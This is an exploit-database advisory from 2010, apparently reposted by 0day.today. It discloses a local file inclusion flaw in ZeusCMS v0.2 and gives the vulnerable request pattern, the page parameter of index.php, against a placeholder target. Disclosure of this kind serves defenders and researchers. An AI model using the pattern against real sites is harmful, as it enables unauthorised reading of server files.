id: 10882
date: 02/13/2010
title: ZeusCMS v0.2 Local File Include Vulnerability
author: ViRuSMaN
cves: 

=============================================
ZeusCMS v0.2 Local File Include Vulnerability
=============================================

[»] Script: [ ZeusCMS ]
[»] Language: [ PHP ]
[»] Site page: [ ZeusCMS is yet another Content Management System ]
[»] Download: [ http://sourceforge.net/projects/zeuscms/files/ZeusCMS%20v0.2/ ]

###########################################################################
 
===[ Exploit ]===
 
[»] http://[target].com/[path]/index.php?page=[LFI]
 
 
Author: ViRuSMaN <-
 
###########################################################################



#  0day.today [2023-03-25]  #